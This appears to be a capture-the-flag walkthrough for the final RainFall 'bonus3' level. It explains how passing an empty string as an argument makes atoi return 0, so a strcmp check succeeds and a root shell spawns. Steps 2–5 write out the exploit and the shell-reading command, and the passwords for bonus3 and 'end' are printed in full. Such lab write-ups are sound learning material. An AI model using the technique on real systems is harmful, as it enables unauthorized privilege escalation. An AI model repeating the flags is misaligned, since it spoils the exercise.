1. Download the binary from the server:
   scp -P 2222 bonus3@localhost:~/bonus3 .
   Password: 71d449df0f960b36e0055eb58c14d0f5d0ddc0b35328d657f91cf0df15910587

2. Analyze the binary with Ghidra:
   - Opens "/home/user/end/.pass" and reads 66 bytes into buffer
   - Performs: buffer[atoi(argv[1])] = '\0'
   - Reads 65 more bytes from .pass into message
   - Compares: strcmp(buffer, argv[1])
   - If match: execl("/bin/sh") → Shell spawned!
   
   Key vulnerability:
   - atoi("") returns 0
   - buffer[0] = '\0' makes buffer empty string
   - strcmp("", "") returns 0 → Match!

3. Connect to the VM via SSH:
   ssh bonus3@localhost -p 2222
   Password: 71d449df0f960b36e0055eb58c14d0f5d0ddc0b35328d657f91cf0df15910587

4. Execute the exploit:
   ./bonus3 ""
   
   Logic:
   - atoi("") = 0
   - buffer[0] = '\0' (buffer becomes empty string)
   - strcmp("", "") = 0 (strings match)
   - execl("/bin/sh") executes

5. Read the final password:
   cat /home/user/end/.pass
   
   Password: 3321b6f81659f9a71c76616f606e4b50189cecfea611393d5d649f75e157353c

6. Exit and login as end:
   su end
   
   Congratulations! You've completed RainFall! 🎉
